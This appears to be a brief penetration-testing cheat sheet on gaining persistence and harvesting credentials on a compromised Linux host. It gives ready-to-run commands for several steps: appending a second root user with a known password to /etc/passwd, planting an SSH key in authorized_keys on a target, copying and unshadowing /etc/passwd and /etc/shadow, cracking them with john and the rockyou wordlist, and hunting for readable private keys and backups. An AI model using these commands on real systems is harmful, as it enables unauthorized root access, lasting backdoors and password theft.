Persistence
Add a second root user
echo root2:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwdAdd ssh key
See SSH.
scp ~/.ssh/id_rsa.pub someuser@${IP}:~/.ssh/authorized_keysCopy content of /etc/passwd and /etc/shadow
Copy content of /etc/passwd and /etc/shadow to Kali (Ctrl+C/Ctrl+V)
/usr/sbin/unshadow passwd shadow > unshadowedCrack passwords
WL=/usr/share/wordlists/rockyou.txt
john --wordlist=$WL unshadowedOther things to check
- Look for scripts
- Look at other users’ home directories (/home/<username>)
- Look for ssh keys in .ssh directories
find / -name *.bak
find / -name *private* -type f -readable 2>/dev/null -exec ls -la {} \;
find / -name *_key* -type f -readable 2>/dev/null -exec ls -la {} \;